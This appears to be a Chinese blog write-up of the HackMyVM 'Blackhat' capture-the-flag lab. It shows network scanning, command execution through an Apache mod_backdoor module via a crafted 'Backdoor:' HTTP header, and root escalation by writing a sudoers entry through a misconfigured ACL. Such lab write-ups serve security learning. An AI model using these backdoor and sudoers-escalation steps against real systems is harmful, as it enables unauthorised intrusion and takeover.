lvzhouhang

HackmyVM-Blackhat

  • ~1.82K 字
  1. 1. 信息搜集

信息搜集

arp-scan -l扫描

1
2
3
4
5
6
7
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:73:b2:7a       PCS Systemtechnik GmbH
192.168.31.140  08:00:27:19:a9:32       PCS Systemtechnik GmbH

192.168.31.140是靶机地址

然后扫描端口

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.140
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-17 00:16 EDT
Nmap scan report for 192.168.31.140
Host is up (0.0019s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:19:A9:32 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds

只开了一个80端口,扫描一下目录可以扫描到一个phpinfo.php

1
Loaded Modules	core mod_so mod_watchdog http_core mod_log_config mod_logio mod_version mod_unixd mod_access_compat mod_alias mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_host mod_authz_user mod_autoindex mod_backdoor mod_deflate mod_dir mod_env mod_filter mod_mime prefork mod_negotiation mod_php7 mod_reqtimeout mod_setenvif mod_status

mod_backdoor 存在漏洞

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.140 -H "Backdoor: id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

反弹一个shell出来,上传 linpeas.sh ,运行看结果

1
2
3
4
5
6
7
8
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls
# file: /etc/sudoers
USER   root       r--
user   darkdante  rw-
GROUP  root       r--
mask              rw-
other             ---

可以看到sudoers文件darkdante有写的权限,darkdante直接su就登录了哈哈哈哈哈

写入sudoers文件

1
darkdante ALL=(ALL:ALL) ALL

然后sudo su,提权成功

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!